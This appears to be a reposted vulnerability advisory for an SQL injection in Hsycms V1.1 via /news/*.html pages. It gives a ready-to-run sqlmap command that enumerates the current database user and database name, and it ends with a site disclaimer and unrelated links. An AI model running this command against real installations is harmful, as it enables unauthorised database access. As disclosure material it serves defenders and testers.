1. The attacker opens http://127.0.0.1/news/*.html," * " Represents any existing page.
2.Then use sqlmap to attack the page.
sqlmap.py -u http://127.0.0.1/news/151*.html --batch --current-user --current-db
An issue was discovered in Hsycms V1.1 . There is an SQL injection vulnerability via /news/*.html page
免責聲明!
本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。
猜您在找
An issue was discovered in Hsycms V1.1 . There is an XSS vulnerability via /book page
XproerIM V1.1發布
拼圖游戲 v1.1
DIY書籍掃描儀簡介v1.1
CesiumLab V1.1 新功能 (免費Cesium處理工具集)
Wonder發布v1.1正式版本,新增資產預覽、腳本、AssetBundle等
ESP32音頻開發板ESP32-Korvo V1.1踩坑
PHP基礎示例:商品信息管理系統v1.1
PHP基礎示例:商品信息管理系統v1.1[轉]
[奉獻]通過命令快速啟動應用程序的小軟件(QuickLauncher V1.1)